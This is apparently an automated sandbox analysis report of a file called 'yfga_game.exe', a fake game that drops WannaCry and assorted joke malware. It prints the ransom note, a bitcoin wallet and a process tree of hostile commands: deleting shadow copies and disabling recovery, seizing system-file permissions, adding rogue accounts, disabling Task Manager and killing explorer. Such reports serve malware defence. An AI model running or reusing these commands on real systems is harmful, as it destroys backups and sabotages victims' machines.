Analysis

  • max time kernel
    78s
  • max time network
    59s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-07-2024 10:38

General

  • Target

    yfga_game.exe

  • Size

    46.3MB

  • MD5

    1947ef762e78e2163483bd34b2d50b23

  • SHA1

    81473c8ad25a5146cb8a023dfcf6c2057ee81aba

  • SHA256

    67243c639e406bf2b643efc243a8406dc82656a6bc134643c4a376cd292852cf

  • SHA512

    6f8c663db1ab0f0843b16425d9ab7b112322387afbf36a58cf5dfea02551a088403671e8d434558d70d530b3ace05406cb6d8990a7a6bb505747c04c22bd6ac7

  • SSDEEP

    786432:x7Ud58tChs1g2uzRb7KPB8NUc3sXEPeEwkHYvgctIKpJZXnfsrQl92Z3tHDUOsj1:ht96h76B0HkGUvgcaKpDPBl92HHDdsGy

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\@[email protected]

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �
Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Signatures

  • Wannacry

    WannaCry is a ransomware cryptoworm.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Possible privilege escalation attempt 7 IoCs
  • ASPack v2.12-2.42 2 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 18 IoCs
  • Loads dropped DLL 10 IoCs
  • Modifies file permissions 1 TTPs 7 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 3 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 29 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 7 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 7 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Runs regedit.exe 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 19 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\yfga_game.exe
    "C:\Users\Admin\AppData\Local\Temp\yfga_game.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5016
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\YFGA.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3896
      • C:\Windows\SysWOW64\net.exe
        net user "GO BACK!" "???" /add
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4168
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 user "GO BACK!" "???" /add
          4⤵
            PID:4356
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskManager" /t REG_DWORD /d 1
          3⤵
            PID:816
          • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\screenscrew.exe
            screenscrew.exe
            3⤵
            • Executes dropped EXE
            PID:1792
          • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\flasher.exe
            flasher.exe
            3⤵
            • Executes dropped EXE
            PID:1628
          • C:\Windows\SysWOW64\takeown.exe
            takeown C:\Windows\System32\logonui.exe Admin
            3⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:2456
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\System32\logonui.exe Grant:\Admin
            3⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:1264
          • C:\Windows\SysWOW64\takeown.exe
            takeown C:\Windows\System32\calc.exe Admin
            3⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:4716
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\System32\calc.exe Grant:\Admin
            3⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:3208
          • C:\Windows\SysWOW64\xcopy.exe
            xcopy calc.exe C:\Windows\System32\calc.exe /-y
            3⤵
            • Drops file in System32 directory
            • Enumerates system info in registry
            PID:1896
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /K hydra.cmd
            3⤵
            • Checks computer location settings
            • Modifies registry class
            • Suspicious use of WriteProcessMemory
            PID:3384
            • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\jokewarehydra.exe
              jokewarehydra.exe
              4⤵
              • Executes dropped EXE
              PID:8
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\annoy3.vbs"
              4⤵
                PID:748
            • C:\Windows\SysWOW64\takeown.exe
              takeown C:\Windows\Boot\Fonts\* Admin
              3⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:3760
            • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\walliant.exe
              walliant.exe
              3⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:3684
              • C:\Users\Admin\AppData\Local\Temp\is-QJ8GS.tmp\walliant.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-QJ8GS.tmp\walliant.tmp" /SL5="$10286,4511977,830464,C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\walliant.exe"
                4⤵
                • Executes dropped EXE
                PID:4536
            • C:\Windows\SysWOW64\net.exe
              net user "FUCK OFF YFGA" "I DONT KNOW" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4880
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 user "FUCK OFF YFGA" "I DONT KNOW" /add
                4⤵
                  PID:2944
              • C:\Windows\SysWOW64\icacls.exe
                icacls C:\Windows\Boot\Fonts\* Grant:\Admin
                3⤵
                • Possible privilege escalation attempt
                • Modifies file permissions
                PID:2352
              • C:\Windows\SysWOW64\xcopy.exe
                xcopy C:\Windows\Fonts\seguisym.ttf C:\Windows\Boot\Fonts\segoe_slboot.ttf /-y
                3⤵
                • Drops file in Windows directory
                • Enumerates system info in registry
                PID:1996
              • C:\Windows\SysWOW64\reg.exe
                reg import reg.reg
                3⤵
                • Sets desktop wallpaper using registry
                PID:3908
              • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\YouAreAnIdiot.exe
                youareanidiot.exe
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:3768
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 1576
                  4⤵
                  • Program crash
                  PID:4040
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im fontdrvhost.exe
                3⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1944
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im TextInputhost.exe
                3⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:676
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im explorer.exe
                3⤵
                • Kills process with taskkill
                PID:4988
              • C:\Windows\SysWOW64\timeout.exe
                timeout 5
                3⤵
                • Delays execution with timeout.exe
                PID:3444
              • C:\Windows\SysWOW64\shutdown.exe
                shutdown /r /t 30000 /c "HAHA I HACKED YOU AYFGA ROCKS YOU"
                3⤵
                  PID:1636
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /K spam.bat "forkbomb" /min
                  3⤵
                    PID:3936
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout 5
                    3⤵
                    • Delays execution with timeout.exe
                    PID:5116
                  • C:\Windows\SysWOW64\shutdown.exe
                    shutdown /a
                    3⤵
                      PID:1972
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout 2
                      3⤵
                      • Delays execution with timeout.exe
                      PID:4432
                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\win7recovery.exe
                      win7recovery.exe
                      3⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Modifies Internet Explorer settings
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of SetWindowsHookEx
                      • System policy modification
                      PID:1548
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 684
                        4⤵
                        • Program crash
                        PID:2116
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 984
                        4⤵
                        • Program crash
                        PID:3436
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 992
                        4⤵
                        • Program crash
                        PID:4404
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 976
                        4⤵
                        • Program crash
                        PID:1996
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 1004
                        4⤵
                        • Program crash
                        PID:2920
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 1040
                        4⤵
                        • Program crash
                        PID:3988
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 1068
                        4⤵
                        • Program crash
                        PID:2380
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 1028
                        4⤵
                        • Program crash
                        PID:3104
                      • C:\ProgramData\WbVhxCIDDK.exe
                        "C:\ProgramData\WbVhxCIDDK.exe"
                        4⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4980
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 588
                          5⤵
                          • Program crash
                          PID:5436
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 1220
                        4⤵
                        • Program crash
                        PID:5448
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 1608
                        4⤵
                        • Program crash
                        PID:2892
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 1580
                        4⤵
                        • Program crash
                        PID:3116
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 1796
                        4⤵
                        • Program crash
                        PID:3936
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 1868
                        4⤵
                        • Program crash
                        PID:3760
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 2044
                        4⤵
                        • Program crash
                        PID:5188
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 2168
                        4⤵
                        • Program crash
                        PID:5272
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 2212
                        4⤵
                        • Program crash
                        PID:5288
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 2220
                        4⤵
                        • Program crash
                        PID:4952
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 2024
                        4⤵
                        • Program crash
                        PID:5568
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 1800
                        4⤵
                        • Program crash
                        PID:5676
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 1792
                        4⤵
                        • Program crash
                        PID:5756
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 1916
                        4⤵
                        • Program crash
                        PID:3240
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 1908
                        4⤵
                        • Program crash
                        PID:2108
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 1752
                        4⤵
                        • Program crash
                        PID:5852
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 1756
                        4⤵
                        • Program crash
                        PID:6088
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 1756
                        4⤵
                        • Program crash
                        PID:6132
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 1784
                        4⤵
                        • Program crash
                        PID:864
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 1888
                        4⤵
                        • Program crash
                        PID:5804
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im WScript.exe
                      3⤵
                      • Kills process with taskkill
                      PID:4708
                    • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\wannacryptor.exe
                      wannacryptor.exe
                      3⤵
                      • Drops startup file
                      • Executes dropped EXE
                      • Sets desktop wallpaper using registry
                      PID:1044
                      • C:\Windows\SysWOW64\attrib.exe
                        attrib +h .
                        4⤵
                        • Views/modifies file attributes
                        PID:2456
                      • C:\Windows\SysWOW64\icacls.exe
                        icacls . /grant Everyone:F /T /C /Q
                        4⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        PID:2424
                      • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\taskdl.exe
                        taskdl.exe
                        4⤵
                        • Executes dropped EXE
                        PID:1560
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c 139601721039971.bat
                        4⤵
                          PID:4380
                        • C:\Windows\SysWOW64\attrib.exe
                          attrib +h +s F:\$RECYCLE
                          4⤵
                          • Views/modifies file attributes
                          PID:808
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            5⤵
                              PID:5116
                          • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\@[email protected]
                            4⤵
                            • Executes dropped EXE
                            • Suspicious use of SetWindowsHookEx
                            PID:5736
                            • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\TaskData\Tor\taskhsvc.exe
                              TaskData\Tor\taskhsvc.exe
                              5⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious behavior: EnumeratesProcesses
                              PID:5932
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c start /b @[email protected] vs
                            4⤵
                              PID:5752
                              • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\@[email protected]
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of SetWindowsHookEx
                                PID:5800
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                  6⤵
                                    PID:5348
                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                      wmic shadowcopy delete
                                      7⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5372
                              • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\taskse.exe
                                taskse.exe C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\@[email protected]
                                4⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5236
                              • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\@[email protected]
                                4⤵
                                • Executes dropped EXE
                                • Sets desktop wallpaper using registry
                                • Suspicious use of SetWindowsHookEx
                                PID:5200
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ncdhmfygzvku207" /t REG_SZ /d "\"C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\tasksche.exe\"" /f
                                4⤵
                                  PID:5264
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ncdhmfygzvku207" /t REG_SZ /d "\"C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\tasksche.exe\"" /f
                                    5⤵
                                    • Adds Run key to start application
                                    • Modifies registry key
                                    PID:5316
                                • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\taskdl.exe
                                  taskdl.exe
                                  4⤵
                                  • Executes dropped EXE
                                  PID:5340
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout 12
                                3⤵
                                • Delays execution with timeout.exe
                                PID:3572
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout 1
                                3⤵
                                • Delays execution with timeout.exe
                                PID:4592
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /f /im explorer.exe
                                3⤵
                                • Kills process with taskkill
                                PID:3216
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /f /im taskmgr.exe
                                3⤵
                                • Kills process with taskkill
                                PID:4348
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /f /im WScript.exe
                                3⤵
                                • Kills process with taskkill
                                PID:2056
                              • C:\Windows\SysWOW64\shutdown.exe
                                shutdown /a
                                3⤵
                                  PID:4968
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout 1
                                  3⤵
                                  • Delays execution with timeout.exe
                                  PID:3660
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /K bloatware.cmd
                                  3⤵
                                    PID:4852
                                  • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\useroverflow.exe
                                    useroverflow.exe
                                    3⤵
                                    • Executes dropped EXE
                                    PID:4228
                                  • C:\Users\Admin\Desktop\yfga_game_2cda035c-b0fb-4f8c-a038-63453a96a2b3\programoverflow.exe
                                    programoverflow.exe
                                    3⤵
                                    • Executes dropped EXE
                                    PID:4608
                                  • C:\Windows\SysWOW64\notepad.exe
                                    notepad.exe
                                    3⤵
                                      PID:3868
                                    • C:\Windows\SysWOW64\regedit.exe
                                      regedit.exe
                                      3⤵
                                      • Runs regedit.exe
                                      PID:828
                                    • C:\Windows\SysWOW64\mspaint.exe
                                      mspaint.exe
                                      3⤵
                                      • Drops file in Windows directory
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of SetWindowsHookEx
                                      PID:836
                                    • C:\Windows\SysWOW64\charmap.exe
                                      charmap.exe
                                      3⤵
                                        PID:2692
                                      • C:\Windows\SysWOW64\net.exe
                                        net user "CRY TO UR MOTHA" "1488" /add
                                        3⤵
                                          PID:852
                                        • C:\Windows\SysWOW64\net.exe
                                          net user "CRY TO UR MOTHAR HEHEHEEHEHEHAHAHAHHHHHHHHHAAAAAAA" "1488" /add
                                          3⤵
                                            PID:4800
                                          • C:\Windows\SysWOW64\net.exe
                                            net user "CRY TO UR MOTHA" /active:no
                                            3⤵
                                              PID:3572
                                            • C:\Windows\SysWOW64\net.exe
                                              net user "racism is not good" "1488" /add
                                              3⤵
                                                PID:1200
                                              • C:\Windows\SysWOW64\net.exe
                                                net user 21609 * /add
                                                3⤵
                                                  PID:4032
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout 21
                                                  3⤵
                                                  • Delays execution with timeout.exe
                                                  PID:2040
                                            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"
                                              1⤵
                                              • Checks processor information in registry
                                              • Modifies Internet Explorer settings
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of FindShellTrayWindow
                                              • Suspicious use of SetWindowsHookEx
                                              • Suspicious use of WriteProcessMemory
                                              PID:4232
                                              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                                2⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:3928
                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=BD627983A94CC46355B2A163DB6EB497 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=BD627983A94CC46355B2A163DB6EB497 --renderer-client-id=2 --mojo-platform-channel-handle=1652 --allow-no-sandbox-job /prefetch:1
                                                  3⤵
                                                    PID:2640
                                                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4861C3DECB7E6E9ED2DC34D1E7411DEF --mojo-platform-channel-handle=1756 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                    3⤵
                                                      PID:4032
                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6AECE5F5078A83CF8C3F174E2EBCB6BA --mojo-platform-channel-handle=2392 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                      3⤵
                                                        PID:2992
                                                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=BEEEB8364CA2C88741EED9143ACA76C0 --mojo-platform-channel-handle=1920 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                        3⤵
                                                          PID:4348
                                                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
